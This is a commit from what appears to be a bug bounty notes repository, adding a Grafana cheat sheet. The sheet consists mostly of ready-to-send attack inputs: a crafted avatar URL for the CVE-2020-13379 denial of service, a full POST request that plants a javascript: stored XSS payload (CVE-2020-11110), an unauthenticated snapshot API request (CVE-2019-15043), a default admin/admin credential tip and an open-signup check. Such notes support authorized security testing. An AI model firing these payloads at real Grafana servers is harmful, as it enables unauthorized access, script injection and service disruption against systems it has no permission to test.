STRLCPY/AllAboutBugBounty

Added grafana
daffainfo committed 3 years ago

71da1cee

1 parent 0d1b4c34

Total 1 files

■ ■ ■ ■ ■ ■

Technologies/Grafana.md

1	+	# Grafana
2	+	1. CVE-2020-13379 (Denial of Service)
3	+	```
4	+	<GRAFANA URL>/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D
5	+	```
6	+	2. CVE-2020-11110 (Stored XSS)
7	+	```
8	+	POST /api/snapshots HTTP/1.1
9	+	Host: <GRAFANA URL>
10	+	Accept: application/json, text/plain, /
11	+	Accept-Language: en-US,en;q=0.5
12	+	Referer: {{BaseURL}}
13	+	content-type: application/json
14	+	Connection: close
15	+
16	+	{"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}
17	+	```
18	+	3. CVE-2019-15043 (Grafana Unauthenticated API)
19	+	```
20	+	POST /api/snapshots HTTP/1.1
21	+	Host: <GRAFANA URL>
22	+	Connection: close
23	+	Content-Length: 235
24	+	Accept: /
25	+	Accept-Language: en
26	+	Content-Type: application/json
27	+
28	+	{"dashboard":{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
29	+	```
30	+	4. Default Credentials
31	+	```
32	+	Try to login using admin as username and password
33	+	```
34	+	5. Signup Enabled
35	+	```
36	+	<GRAFANA URL>/signup
37	+	```

Added grafana